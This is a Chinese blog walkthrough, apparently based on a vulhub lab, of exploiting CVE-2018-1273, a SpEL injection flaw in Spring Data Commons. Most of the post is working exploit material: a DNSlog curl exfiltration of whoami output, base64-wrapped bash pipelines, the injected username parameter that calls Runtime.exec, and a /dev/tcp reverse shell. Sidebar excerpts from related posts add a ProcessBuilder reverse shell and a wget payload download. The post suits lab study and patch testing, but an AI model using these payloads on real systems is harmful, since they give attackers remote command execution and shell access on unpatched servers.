Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)漏洞验证与getshell

最新推荐文章于 2024-04-26 09:33:44 发布
最新推荐文章于 2024-04-26 09:33:44 发布
阅读量1.1k 收藏
点赞数
分类专栏: vulhub 文章标签: spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119323425
版权

利用条件

影响版本

· Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)

· Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
· Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
· Spring Data REST 3.0 - 3.0.5 (Kay SR5)

复现过程

vulhub
详细过程请看Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

一、验证

这里使用dnslog来验证。
先获取一个dns地址
t15gcx.dnslog.cn
在这里插入图片描述
拼接命令

curl `whoami`.t15gcx.dnslog.cn

base64编码
对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符)
在这里插入图片描述

bash -c {echo,Y3VybCBgd2hvYW1pYC50MTVnY3guZG5zbG9nLmNu}|{base64,-d}|{bash,-i}

exp

替换对应的payload,重新发送数据包
成功反弹回显到dnslog上

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,Y3VybCBgd2hvYW1pYC50MTVnY3guZG5zbG9nLmNu}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=

在这里插入图片描述

二、反弹shell

反弹shell

bash -i >& /dev/tcp/192.168.100.23/9090 0>&1

base64编码
对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}
监听9090端口
在这里插入图片描述
替换掉curlwhoami.t15gcx.dnslog.cn对应的payload,重新发送数据包
成功反弹shell
在这里插入图片描述
参考文章:
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273

樱浅沐冰
关注
专栏目录
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1711
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 2947
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 689
CVE-2018-1273漏洞分析
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
EC_Carrot的博客
08-04 306
漏洞简介 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令漏洞复现 参考文章中的payload,在注册的时候抓包,并修改成如下数据包,即可运行命令: POST /users?page=&size=5 HTTP/1.1 Host: localh
Spring Data Commons-远程命令执行漏洞CVE-2018-1273
qq_43381463的博客
04-19 448
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令
001--什么是SpringData
weixin_42288943的博客
04-17 176
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1349
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1849
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
最新发布
zz12345600354的博客
04-26 674
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 403
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273
weixin_41438728的博客
12-02 1592
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞复现 漏洞修复 ...
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273
wutiangui的博客
09-10 864
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现
weixin_44023403的博客
03-27 827
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现前期准备一、漏洞复现二、总结 前期准备 工具:burpsuite、firefox浏览器 环境:kali 一、漏洞复现 (1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包; 找到我们提交的数据,之后发送到repeater进行修改数据包; 构造payload,修改数据包,创建文件,进行发包测试;
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 520
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
spring 代码执行CVE-2018-1273
YouthBelief的博客
11-11 1805
spring 代码执行 CVE-2018-1273spring 代码执行CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget反弹shell0x04 漏洞修复 spring 代码执行CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
Spring Data Commons远程命令执行(CVE-2018-1273)
Lucky1youzi的博客
01-02 278
渗透
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 865
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值